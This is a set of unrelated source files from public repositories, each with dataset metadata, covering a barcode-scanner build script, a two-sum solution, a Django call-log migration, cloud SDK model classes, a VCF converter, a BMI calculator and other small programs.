c3ad0423c6d8b271ee252911c594199f7ab74981 | 98a9e00e0e3148e296cecf8bb5e5493d5e7c9cda | /pavement.py | d2b4556aeac8553cddab8d302a000b78bed97169 | [] | no_license | cfobel/barcode-scanner | 62b81f4d1bd36a61fea369703f9dee833916a982 | a59acd8fef93769992b3d7a50365fbbef2d475e6 | refs/heads/master | 2016-09-14T01:42:03.545862 | 2016-04-20T18:46:02 | 2016-04-20T18:46:02 | 56,710,781 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,877 | py | import platform
import sys
from paver.easy import task, needs, path, sh, cmdopts, options
from paver.setuputils import setup, install_distutils_tasks
from distutils.extension import Extension
from distutils.dep_util import newer
sys.path.insert(0, path('.').abspath())
import version
install_requires = ['matplotlib>=1.5.0', 'numpy', 'pygst-utils>=0.3.post4',
'zbar']
# Platform-specific package requirements.
if platform.system() == 'Windows':
install_requires += ['opencv-python', 'pygtk2-win', 'pycairo-gtk2-win',
'pygst-0.10-win']
else:
try:
import gtk
except ImportError:
        print >> sys.stderr, ('Please install Python bindings for Gtk 2 using '
'your systems package manager.')
try:
import cv2
except ImportError:
        print >> sys.stderr, ('Please install OpenCV Python bindings using your '
'systems package manager.')
try:
import gst
except ImportError:
        print >> sys.stderr, ('Please install GStreamer Python bindings using '
'your systems package manager.')
setup(name='barcode-scanner',
version=version.getVersion(),
description='Barcode scanner based on GStreamer, zbar, and gtk.',
keywords='gtk, zbar, gstreamer',
author='Christian Fobel and Michael D. M. Dryden',
author_email='[email protected] and [email protected]',
url='https://github.com/wheeler-microfluidics/barcode-scanner',
license='GPL',
packages=['barcode_scanner', ],
install_requires=install_requires,
# Install data listed in `MANIFEST.in`
include_package_data=True)
@task
@needs('generate_setup', 'minilib', 'setuptools.command.sdist')
def sdist():
"""Overrides sdist to make sure that our setup.py is generated."""
pass
| [
"[email protected]"
] | |
9fab66e95f7f0019a0d653ed7dd76704f7ec115a | 3473c619629ed2b6c69c9d89bc0b3229b6930137 | /Day 06 - Functions and Modules/Prime.py | 3577b2eec902655e2f93a4d6832b4d5b1d1c9034 | [] | no_license | Bobby981229/Python-Learning | 621b185e212bf7102f75c9b8ff5992ceffa0c78b | e37c37fab504597ddca569213394cec4f88ad1f4 | refs/heads/master | 2022-10-14T07:56:59.117446 | 2020-06-09T13:42:12 | 2020-06-09T13:42:12 | 259,191,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | """
Prime number check
"""
from math import sqrt  # square root
def prime(num):
    result = int(sqrt(num))  # integer square root of the input number
for x in range(2, result + 1):
        if num % x == 0:  # check whether x divides num evenly
return False
return True if num != 1 else False
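# e.g. prime(7) -> True; prime(9) -> False (3 divides 9); prime(1) -> False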
num = int(input('Please input an integer number: '))
# 0 is false, 1 is true
print('%d result: %d' % (num, prime(num)))
| [
"[email protected]"
] | |
26cda9d143eff38c26755fdc0f64aac127dfe784 | cd0a284c47fb03121e05284b6d5f2940ea6457ba | /fb/misc/subset-backtracking.py | 5e9517de45750964ef37a1896e73ff591ccb175c | [] | no_license | franktank/py-practice | 5803933c07c07a06670f83b059806385d0d029fa | 1dec441f1975d402d093031569cfd301eb71d465 | refs/heads/master | 2021-03-22T04:33:20.818891 | 2017-11-14T03:40:54 | 2017-11-14T03:40:54 | 101,592,046 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 480 | py | class Solution(object):
def subsets(self, nums):
"""
:type nums: List[int]
:rtype: List[List[int]]
"""
self.res = []
self.helper(nums, [], 0)
return self.res
def helper(self, nums, cur_set, start):
self.res.append(list(cur_set))
for i in range(start, len(nums)):
cur_set.append(nums[i])
self.helper(nums, cur_set, i + 1) # i+1 because no duplicates
cur_set.pop()
| [
"[email protected]"
] | |
bb6aea31ed8fa714e9f3e4f9efea69c2821b47ef | dfcb9827b966a5055a47e27b884eaacd88269eb1 | /ssseg/cfgs/ce2p/cfgs_atr_resnet101os8.py | 92f1a161fe76d80856d312d01c4f8809fa71a746 | [
"MIT"
] | permissive | RiDang/sssegmentation | cdff2be603fc709c1d03897383032e69f850f0cd | 2a79959a3d7dff346bab9d8e917889aa5621615a | refs/heads/main | 2023-02-05T12:52:35.391061 | 2020-12-27T05:59:58 | 2020-12-27T05:59:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,326 | py | '''define the config file for atr and resnet101os8'''
from .base_cfg import *
# modify dataset config
DATASET_CFG = DATASET_CFG.copy()
DATASET_CFG['train'].update(
{
'type': 'atr',
'rootdir': 'data/ATR',
'aug_opts': [('Resize', {'output_size': (520, 520), 'keep_ratio': False, 'scale_range': (0.75, 1.25)}),
('RandomCrop', {'crop_size': (473, 473), 'one_category_max_ratio': 0.75}),
('RandomFlip', {'flip_prob': 0.5, 'fix_ann_pairs': [(9, 10), (12, 13), (14, 15)]}),
('RandomRotation', {'angle_upper': 30, 'rotation_prob': 0.6}),
('PhotoMetricDistortion', {}),
('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
('ToTensor', {}),
('Padding', {'output_size': (473, 473), 'data_type': 'tensor'}),]
}
)
DATASET_CFG['test'].update(
{
'type': 'atr',
'rootdir': 'data/ATR',
'aug_opts': [('Resize', {'output_size': (473, 473), 'keep_ratio': False, 'scale_range': None}),
('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
('ToTensor', {}),]
}
)
# modify dataloader config
DATALOADER_CFG = DATALOADER_CFG.copy()
DATALOADER_CFG['train'].update(
{
'batch_size': 32,
}
)
# modify optimizer config
OPTIMIZER_CFG = OPTIMIZER_CFG.copy()
OPTIMIZER_CFG.update(
{
'max_epochs': 150
}
)
# modify losses config
LOSSES_CFG = LOSSES_CFG.copy()
# modify model config
MODEL_CFG = MODEL_CFG.copy()
MODEL_CFG.update(
{
'num_classes': 18,
'backbone': {
'type': 'resnet101',
'series': 'resnet',
'pretrained': True,
'outstride': 8,
'use_stem': True
}
}
)
# modify common config
COMMON_CFG = COMMON_CFG.copy()
COMMON_CFG['train'].update(
{
'backupdir': 'ce2p_resnet101os8_atr_train',
'logfilepath': 'ce2p_resnet101os8_atr_train/train.log',
}
)
COMMON_CFG['test'].update(
{
'backupdir': 'ce2p_resnet101os8_atr_test',
'logfilepath': 'ce2p_resnet101os8_atr_test/test.log',
'resultsavepath': 'ce2p_resnet101os8_atr_test/ce2p_resnet101os8_atr_results.pkl'
}
) | [
"[email protected]"
] | |
8d99a90f253646661425e340c0b8b5d9743a0554 | 8a3e59ac20b2667c7f43ab91a7fd09f5a52fec4e | /apps/crm/callcentre/migrations/0001_initial.py | 16d3a8789f6799bed13602c35d3f16407455ac78 | [] | no_license | suifengdou/tbd2 | b1ba8ed423ace8624366ddbdd788f0ab7025d062 | 39093cdd45bb652e9cdfa3dc31e07344cf6628a1 | refs/heads/master | 2021-06-22T20:19:15.743182 | 2021-01-08T03:59:47 | 2021-01-08T03:59:47 | 159,639,770 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,422 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2020-11-27 10:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='OriCallLogInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('creator', models.CharField(default='system', max_length=30, verbose_name='创建者')),
('call_time', models.DateTimeField(verbose_name='时间')),
('mobile', models.CharField(max_length=30, verbose_name='客户电话')),
('location', models.CharField(blank=True, max_length=30, null=True, verbose_name='归属地')),
('relay_number', models.CharField(max_length=30, verbose_name='中继号')),
('customer_service', models.CharField(blank=True, max_length=30, null=True, verbose_name='客服')),
('call_category', models.CharField(max_length=30, verbose_name='通话类型')),
('source', models.CharField(max_length=30, verbose_name='来源')),
('line_up_status', models.CharField(blank=True, max_length=30, null=True, verbose_name='排队状态')),
('line_up_time', models.TimeField(verbose_name='排队耗时')),
('device_status', models.CharField(blank=True, max_length=30, null=True, verbose_name='设备状态')),
('result', models.CharField(max_length=30, verbose_name='通话结果')),
('failure_reason', models.CharField(blank=True, max_length=30, null=True, verbose_name='外呼失败原因')),
('call_recording', models.TextField(blank=True, null=True, verbose_name='通话录音')),
('call_length', models.TimeField(verbose_name='通话时长')),
('message', models.TextField(verbose_name='留言')),
('ring_time', models.TimeField(verbose_name='响铃时间')),
('ring_off', models.CharField(blank=True, max_length=30, null=True, verbose_name='通话挂断方')),
('degree_satisfaction', models.CharField(max_length=30, verbose_name='满意度评价')),
('theme', models.CharField(blank=True, max_length=230, null=True, verbose_name='主题')),
('sequence_ring', models.CharField(max_length=30, verbose_name='顺振')),
('relevant_cs', models.CharField(blank=True, max_length=30, null=True, verbose_name='相关客服')),
('work_order', models.CharField(blank=True, max_length=30, null=True, verbose_name='生成工单')),
('email', models.CharField(blank=True, max_length=60, null=True, verbose_name='邮箱')),
('tag', models.CharField(blank=True, max_length=30, null=True, verbose_name='标签')),
('description', models.TextField(blank=True, null=True, verbose_name='描述')),
('leading_cadre', models.CharField(blank=True, max_length=30, null=True, verbose_name='负责人')),
('group', models.CharField(blank=True, max_length=30, null=True, verbose_name='负责组')),
('degree', models.CharField(max_length=30, verbose_name='等级')),
('is_blacklist', models.CharField(max_length=30, verbose_name='是否在黑名单')),
('call_id', models.CharField(max_length=230, verbose_name='call_id')),
('reason', models.CharField(blank=True, max_length=60, null=True, verbose_name='补寄原因')),
('call_class', models.CharField(blank=True, max_length=60, null=True, verbose_name='来电类别')),
('goods_name', models.CharField(blank=True, max_length=60, null=True, verbose_name='商品型号')),
('process_category', models.CharField(blank=True, max_length=60, null=True, verbose_name='处理方式')),
('goods_id', models.CharField(blank=True, max_length=60, null=True, verbose_name='产品编号')),
('purchase_time', models.CharField(blank=True, max_length=60, null=True, verbose_name='购买日期')),
('service_info', models.CharField(blank=True, max_length=230, null=True, verbose_name='补寄配件记录')),
('shop', models.CharField(blank=True, max_length=60, null=True, verbose_name='店铺')),
('order_status', models.IntegerField(choices=[(0, '已取消'), (1, '未处理'), (2, '未抽检'), (3, '已完成')], default=1, verbose_name='单据状态')),
('process_tag', models.IntegerField(choices=[(0, '未处理'), (1, '待核实'), (2, '已确认'), (3, '待清账'), (4, '已处理'), (5, '特殊订单')], default=0, verbose_name='处理标签')),
('mistake_tag', models.SmallIntegerField(choices=[(0, '正常'), (1, '重复建单'), (2, '无补寄原因'), (3, '无店铺'), (4, '补寄配件记录格式错误'), (5, '补寄原因错误'), (6, '单据创建失败')], default=0, verbose_name='错误列表')),
('is_sampling', models.SmallIntegerField(choices=[(0, '否'), (1, '是')], default=0, verbose_name='是否抽检')),
('content_category', models.SmallIntegerField(choices=[(0, '常规'), (1, '订单')], default=0, verbose_name='内容类型')),
],
options={
'verbose_name': 'CRM-原始通话记录-查询',
'verbose_name_plural': 'CRM-原始通话记录-查询',
'db_table': 'crm_cal_oricalllog',
},
),
migrations.CreateModel(
name='CheckOriCall',
fields=[
],
options={
'verbose_name': 'CRM-原始通话记录-未处理',
'verbose_name_plural': 'CRM-原始通话记录-未处理',
'proxy': True,
'indexes': [],
},
bases=('callcentre.oricallloginfo',),
),
]
| [
"[email protected]"
] | |
604cfc5c9093bc10e7a5f34c490d2d20c3543182 | f6d7107e390c35ae998f9d9904c6012515629204 | /env/bin/easy_install-2.7 | b4cb105bdb98b033e5fbf5f4fa7be50d05bfa417 | [] | no_license | theresa-clare/movie-ratings | c066c15991b13a540ad569c040a460834ee5059e | b0e80c728b2396272063b468452e61386315aa56 | refs/heads/master | 2021-01-19T18:07:44.026831 | 2015-05-08T00:05:22 | 2015-05-08T00:05:22 | 35,049,616 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | 7 | #!/home/user/src/ratings/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | |
a96d0e6cbfbb17f69233e6f6c4998a16fd37cf02 | 187a6558f3c7cb6234164677a2bda2e73c26eaaf | /jdcloud_sdk/services/antipro/models/Acl.py | 7832071a16e817c78df10dbe5d03f5fb05ad3d38 | [
"Apache-2.0"
] | permissive | jdcloud-api/jdcloud-sdk-python | 4d2db584acc2620b7a866af82d21658cdd7cc227 | 3d1c50ed9117304d3b77a21babe899f939ae91cd | refs/heads/master | 2023-09-04T02:51:08.335168 | 2023-08-30T12:00:25 | 2023-08-30T12:00:25 | 126,276,169 | 18 | 36 | Apache-2.0 | 2023-09-07T06:54:49 | 2018-03-22T03:47:02 | Python | UTF-8 | Python | false | false | 2,979 | py | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
class Acl(object):
def __init__(self, id=None, priority=None, sipType=None, sip=None, sipIpSetId=None, sipIpSetName=None, dipType=None, dip=None, dipIpSetId=None, dipIpSetName=None, protocol=None, portType=None, port=None, portSetId=None, portSetName=None, action=None, enable=None, remark=None):
"""
        :param id: (Optional) Access control rule ID
        :param priority: (Optional) Rule priority
        :param sipType: (Optional) Source IP type: 0: IP, 1: IP address set
        :param sip: (Optional) Source IP; valid when sipType is 0, otherwise empty
        :param sipIpSetId: (Optional) IP address set ID; valid when sipType is 1, otherwise empty.<br>'-1' Anti-DDoS Pro back-to-origin addresses<br>'-2' Web Application Firewall back-to-origin addresses
        :param sipIpSetName: (Optional) IP address set name
        :param dipType: (Optional) Destination IP type: 0: IP, 1: IP address set
        :param dip: (Optional) Destination IP; valid when dipType is 0, otherwise empty
        :param dipIpSetId: (Optional) IP address set ID; valid when dipType is 1, otherwise empty.<br>'-1' Anti-DDoS Pro back-to-origin addresses<br>'-2' Web Application Firewall back-to-origin addresses
        :param dipIpSetName: (Optional) IP address set name
        :param protocol: (Optional) Protocol type: All Traffic, TCP, UDP and ICMP are supported
        :param portType: (Optional) Port type: 0: port, 1: port set
        :param port: (Optional) Port or port range; valid when portType is 0, otherwise empty
        :param portSetId: (Optional) Port set ID; valid when portType is 1, otherwise empty
        :param portSetName: (Optional) Port set name
        :param action: (Optional) Action: 0: allow, 1: block
        :param enable: (Optional) Rule status: 0: disabled, 1: enabled
        :param remark: (Optional) Remark
"""
self.id = id
self.priority = priority
self.sipType = sipType
self.sip = sip
self.sipIpSetId = sipIpSetId
self.sipIpSetName = sipIpSetName
self.dipType = dipType
self.dip = dip
self.dipIpSetId = dipIpSetId
self.dipIpSetName = dipIpSetName
self.protocol = protocol
self.portType = portType
self.port = port
self.portSetId = portSetId
self.portSetName = portSetName
self.action = action
self.enable = enable
self.remark = remark
| [
"[email protected]"
] | |
d22cefe991498827063e4959c075dfb148945e3f | 853d2dab299c6644056edfdab7f6cd734076e615 | /aliyun-python-sdk-cdn/aliyunsdkcdn/request/v20141111/StartCdnDomainRequest.py | 1fe98d6791628ce234d8637704254071ec620071 | [
"Apache-2.0"
] | permissive | ahlfors/aliyun-openapi-python-sdk | b231d970444efdd44f74cfb6309e0d807e7a9d99 | 002f457788d7ed7f7ebdfaf908a7cc442b66498e | refs/heads/master | 2021-01-02T22:56:04.359010 | 2017-08-04T06:36:47 | 2017-08-04T06:36:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,512 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class StartCdnDomainRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Cdn', '2014-11-11', 'StartCdnDomain','None')
def get_SecurityToken(self):
return self.get_query_params().get('SecurityToken')
def set_SecurityToken(self,SecurityToken):
self.add_query_param('SecurityToken',SecurityToken)
def get_DomainName(self):
return self.get_query_params().get('DomainName')
def set_DomainName(self,DomainName):
self.add_query_param('DomainName',DomainName)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId) | [
"[email protected]"
] | |
cd6a20e990cb2dbee4a8386d99bf84e07bae879e | 98bd2625dbcc955deb007a07129cce8b9edb3c79 | /vcf2SelectHapStatsInput.py | cc27f18f4a524c23fd3541a1cbad9fa9ac27e99a | [] | no_license | melanieabrams/bremdata | 70d0a374ab5dff32f6d9bbe0a3959a617a90ffa8 | df7a12c72a29cca4760333445fafe55bb6e40247 | refs/heads/master | 2021-12-26T01:57:25.684288 | 2021-09-30T22:48:05 | 2021-09-30T22:48:05 | 166,273,567 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,175 | py | import os
import vcf
import sys
##USAGE: python vcf2SelectHapStatsInput.py gvcf_filename
##NOTE: this script assumes gVCF formatting, as generated by GATK. It handles missing data as missing.
##PARAMETERS
samples_to_exclude=[] # for 1011 genomes (all pop)
heterozygous_present=True # True for 1011 genomes S cerevisiae
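# Output format (illustrative, assumed data): each kept line is "<pos>,<allele>,<allele>,..."
# e.g. "12345,A,A,.,T" -- heterozygous genotypes are written as '.', and any position
# with an INDEL or a missing call is skipped entirely.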
##RUN
def main():
missing_data={} #samples with uncalled variant positions
samples_tested=""
num_samples_tested=0
##
with open(outfile_name,"w") as wf:
vcf_reader = vcf.Reader(open(vcf_filename, 'r'))
for record in vcf_reader:
pos_line=""
pos=record.POS
pos_line+=str(pos)
for call in record.samples:
sample=call.sample
if sample not in samples_to_exclude:
if sample not in samples_tested:
samples_tested+=sample+", "
num_samples_tested+=1
if call.gt_type!=None and call.gt_bases!=None:
allele=call.gt_bases
if heterozygous_present==True:
bases=allele.split('/')
if bases[0]!=bases[1]:
allele='.' # represent heterozygous GT as dots
else:
allele=bases[0] #if homozygous, represent GT as the base
if len(allele)>1:
allele = 'INDEL'
else:
allele='None'
if sample in missing_data:
missing_data[sample]+=','+str(pos)
else:
missing_data[sample]=str(pos)
pos_line+=","+str(allele)
if 'INDEL' not in pos_line and 'None' not in pos_line:
wf.writelines(pos_line+"\n") #omit lines with missing data
## print(pos_line)
## exit() #break for speediness
with open(errfile_name,"w") as wf:
wf.writelines("the following samples were excluded")
wf.writelines("%s," % sample for sample in samples_to_exclude)
wf.writelines("shs input generated for the following"+str(num_samples_tested)+"samples\n")
wf.writelines(samples_tested+"\n")
wf.writelines("sample\tuncalled_pos\n")
for sample in missing_data:
wf.writelines(sample+"\t"+missing_data[sample]+"\n")
if __name__ == '__main__':
vcf_filename=sys.argv[1]
outfile_name=vcf_filename.split('.')[0]+".shsinput"
errfile_name=vcf_filename.split('.')[0]+".missing_call_log"
main()
| [
"[email protected]"
] | |
ebec731334511b25ef15e389dd83a5ec4e2d6dea | 9998f1b6008b290ef1ef895bc0c4ca273dfbe1e0 | /leet code/002-Two Sum.py | 8be38348c0937606c72f279e23b69bb43af0b139 | [
"MIT"
] | permissive | boisde/Greed_Island | 51a997dc0e7890ea468c448bc1dda34e61a4aea8 | 9c4f0195fb7bfaeb6c29e8e9638c7b0ffd9ad90b | refs/heads/master | 2021-06-15T06:58:35.036706 | 2021-04-12T11:14:54 | 2021-04-12T11:14:54 | 20,638,183 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,983 | py | #coding=utf-8
"""
Given an array of integers, find two numbers such that they add up to a specific target number.
The function twoSum should return indices of the two numbers such that they add up to the target,
where index1 must be less than index2.
Please note that your returned answers (both index1 and index2) are not zero-based.
You may assume that each input would have exactly one solution.
Input: numbers={2, 7, 11, 15}, target=9
Output: index1=1, index2=2
"""
class Solution(object):
@staticmethod
def two_sum_n_squared(numbers, target):
# brute force method
N = len(numbers)
for i in range(N):
for j in range(N):
if numbers[i]+numbers[j] == target and i != j:
# don't forget the parenthesis, or will report compile error with
# "too many values to unpack"
smaller, bigger = (i+1, j+1) if i+1 < j+1 else (j+1, i+1)
return smaller, bigger
@staticmethod
def two_sum_n(numbers, target):
N = len(numbers)
num_dict = {}
for i in range(N):
num_dict[numbers[i]] = i
for i in range(N):
to_find = target - numbers[i]
# remember to rule self out
if to_find in num_dict and num_dict[to_find] != i:
smaller, bigger = i+1, num_dict[to_find] + 1
smaller, bigger = (smaller, bigger) if smaller<bigger else (bigger, smaller)
return smaller, bigger
return -1, -1
@staticmethod
def two_sum_n_refined(num, target):
num_dict = {}
for i in range(len(num)):
partner = target - num[i]
# no need to rule self out here, cause you won't encounter yourself again.
if partner in num_dict:
# 1) by the time find your partner, you are already in dictionary,
# and you are always the prior one.
# 2) no need to deal with duplicates, duplicates that is solution to <target> will
# be properly handled; not part of solution, the value of the <num_dict> will be
# the later duplication's index, but that does not matter.
return num_dict[partner]+1, i+1
else:
num_dict[num[i]] = i
return -1, -1
"""
Follow up Question:
What if the given input is already sorted in ascending order?
"""
@staticmethod
# Input: num is sorted
def two_sum_2_nlogn(num, target):
import bisect
N = len(num)
for i in range(N):
partner = target - num[i]
insertion_point = bisect.bisect_left(num, partner)
# use binary search, if found it; rule self out
if insertion_point != N and num[insertion_point] == partner and i != insertion_point:
smaller = i+1
bigger = insertion_point + 1
smaller, bigger = (smaller, bigger) if smaller<bigger else (bigger, smaller)
return smaller, bigger
return -1, -1
@staticmethod
# Input: num is sorted
def two_sum_2_n_refined(num, target):
N = len(num)
prior, later = 0, N-1
# two pointer pointing to ith and jth elements, num[i] and num[j],
# num[i]+num[j] can only be >,<,== target.
for _ in range(N-1):
if num[prior] + num[later] == target:
return prior+1, later+1
elif num[prior] + num[later] > target:
later -= 1
else:
prior += 1
return -1, -1
class TwoSum(object):
"""
Follow up Question: [HARDER--much more details to consider]
Design and implement a TwoSum class. It should support the following operations: add
and find.
add(input) – Add the number input to an internal data structure.
find(value) – Find if there exists any pair of numbers which sum is equal to the value.
For example,
add(1); add(3); add(5); find(4) true; find(7) false
"""
def __init__(self):
self.numbers = {} # <key=number value>: <value=1-based index, could be list if duplicate>
self.count = 1
# store input into a hash map, handle duplicates carefully
def add_constant_runtime(self, x):
# if duplicated and still not a list, change the value to a list.
# Do NOT re-list it!!!
if x in self.numbers and type(self.numbers[x]) is int:
self.numbers[x] = [self.numbers[x]]
self.numbers[x].append(self.count)
elif x in self.numbers:
self.numbers[x].append(self.count)
else:
self.numbers[x] = self.count
self.count += 1
# find target-num[i] in hash map
def find_n_runtime(self, target):
for elem in self.numbers.iterkeys():
partner = target - elem
# edge case: duplicates adds up to target
if partner == elem and partner in self.numbers and type(self.numbers[elem]) is list:
return self.numbers[elem][0], self.numbers[elem][1]
# normal case: found it.
if partner in self.numbers:
if type(self.numbers[elem]) is int:
prior = self.numbers[elem]
else:
prior = self.numbers[elem][0]
if type(self.numbers[partner]) is int:
later = self.numbers[partner]
else:
later = self.numbers[partner][0]
return (prior, later) if prior<later else (later, prior)
return -1, -1
if __name__ == "__main__":
print Solution.two_sum_n_refined([3,2,4], 6) # (2,3)
print Solution.two_sum_n_refined([3,2,2], 4) # (2,3)
print Solution.two_sum_n_refined([3,2,2,2,2,2,2,2,2,2,2,2,2,2], 4) # (2,3)
print Solution.two_sum_n_refined([3], 4) # (-1,-1)
# for follow up question 2, with input num array already sorted in ascending order
print Solution.two_sum_2_nlogn([2,3,4], 6) # (1,3)
print Solution.two_sum_2_nlogn([2,2,3], 4) # (1,2), should not be (1,1)
print Solution.two_sum_2_nlogn([2,2,2,2,2,2,2,2,2,2,2,2,3], 4) # (1,2)
print Solution.two_sum_2_nlogn([3], 4) # (-1,-1)
print Solution.two_sum_2_n_refined([2,3,4], 6) # (1,3)
print Solution.two_sum_2_n_refined([2,2,3], 4) # (1,2), should not be (1,1)
print Solution.two_sum_2_n_refined([2,2,2,2,2,2,2,2,2,2,2,2,3], 4) # (1,2)
print Solution.two_sum_2_n_refined([3], 4) # (-1,-1)
# for follow up question 3: data structure design
two_sum = TwoSum()
for i in [2,3,4]:
two_sum.add_constant_runtime(i)
print two_sum.find_n_runtime(6) # (1,3)
for i in [2,2,2,2,2,2,2,2,2,2,2,2,3]:
two_sum.add_constant_runtime(i)
print two_sum.find_n_runtime(4) # (1,4)
for i in [4]:
two_sum.add_constant_runtime(i)
print two_sum.find_n_runtime(14) # (-1,-1) | [
"[email protected]"
] | |
5f9e775a7ab8bd1de57638ea892c2b7c8c3e3e6a | c838b0eaf08c63284bd29442f8a0a297d1558fd5 | /lagom/policies/random_policy.py | e19f315de4d7b034ecb4e8bf785077ab607fc0a3 | [
"MIT"
] | permissive | vin136/lagom | ccd0f4a3e469c1ee8ef88b1f5248e712b51c5704 | 54e1890e6450f4b1bf499a838963c5d1a3b2da6a | refs/heads/master | 2020-04-22T21:45:51.488458 | 2019-02-13T16:41:32 | 2019-02-13T16:41:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,077 | py | from .base_policy import BasePolicy
class RandomPolicy(BasePolicy):
r"""Random policy.
The action is uniformly sampled from action space.
Example::
        policy = RandomPolicy(config=None, env_spec=env_spec)
policy(observation)
"""
def __init__(self, config, env_spec):
self.config = config
self._env_spec = env_spec
def make_networks(self, config):
pass
def make_optimizer(self, config, **kwargs):
pass
def optimizer_step(self, config, **kwargs):
pass
def reset(self, config, **kwargs):
pass
def __call__(self, x, out_keys=['action'], **kwargs):
out_policy = {}
if self.env_spec.is_vec_env:
action = [self.action_space.sample() for _ in range(self.env_spec.env.num_env)]
else:
action = self.action_space.sample()
out_policy['action'] = action
return out_policy
@property
def recurrent(self):
pass
| [
"[email protected]"
] | |
ba9ca47753df3cc1fa8c8a864a4387c6a3a2f322 | 9a26d98f6f531b222c332ab6367e9e18beb0633f | /008. Dynamic Programming [동적 프로그래밍]/venv/Scripts/easy_install-3.8-script.py | 31936c0e1b179dcf18187893df7efb9e2d4ed4f9 | [] | no_license | yoonicode/of-Algorithms | dffac0b422e51dcd7df1f60236675608af73f03d | bbf89df443a3561fbbe0d0f6dfebb97f3ed216aa | refs/heads/master | 2022-11-24T08:27:52.679469 | 2020-07-28T14:58:52 | 2020-07-28T14:58:52 | null | 0 | 0 | null | null | null | null | UHC | Python | false | false | 523 | py | #!"D:\Users\Yoonsung\Documents\GitHub\of-Algorithms\008. Dynamic Programming [동적 프로그래밍]\venv\Scripts\python.exe" -x
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.8'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.8')()
)
| [
"[email protected]"
] | |
5489c893e687e6aed670cc7fdcc9bf6a16248996 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5640146288377856_1/Python/StefanPochmann/A.py | 854b3312bd1dba6383f564157857729276cad94e | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | #f = open('A.in')
#def input():
# return next(f)
for x in range(1, int(input()) + 1):
R, C, W = map(int, input().split())
#print(R, C, W)
print('Case #%d:' % x, W + (C-1) // W + (R-1) * (C // W))
| [
"[email protected]"
] | |
e3bf180b1c85b33e05c07e36ed9b8cbfe6534857 | 309d17b81cea038713ba67bee72a41d2df4d6869 | /Python/Python_basic/Python_OOP/OOP6_bmi.py | d2e2087aa8b93b01272764517ec6df4319cee4a3 | [] | no_license | Bongkot-Kladklaen/Programming_tutorial_code | ac07e39da2bce396e670611884436b360536cdc5 | cda7508c15c3e3d179c64b9aac163b6173ef3519 | refs/heads/master | 2023-06-20T13:14:17.077809 | 2021-07-18T04:41:04 | 2021-07-18T04:41:04 | 387,081,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 705 | py | class Bmi:
def __init__(self,w_kg, h_cm):
self.w_kg = w_kg
self.h_cm = h_cm
def bmi(self):
return self.w_kg / (self.h_cm / 100) ** 2
def category(self):
diag = ""
        if self.bmi() < 18.5:
            diag = "ต่ำกว่าเกณฑ์"  # underweight (below the healthy range)
        elif 18.5 <= self.bmi() <= 25:
            diag = "ตามเกณฑ์"  # normal (within the healthy range)
        elif 25 < self.bmi() <= 30:
            diag = "เกินเกณฑ์"  # overweight (above the healthy range)
        elif self.bmi() > 30:
            diag = "อ้วน"  # obese
return diag
def __str__(self):
return f"BMI = {self.bmi()} ({self.category()})"
if __name__ == "__main__":
a = Bmi(50,164)
print(a) | [
"[email protected]"
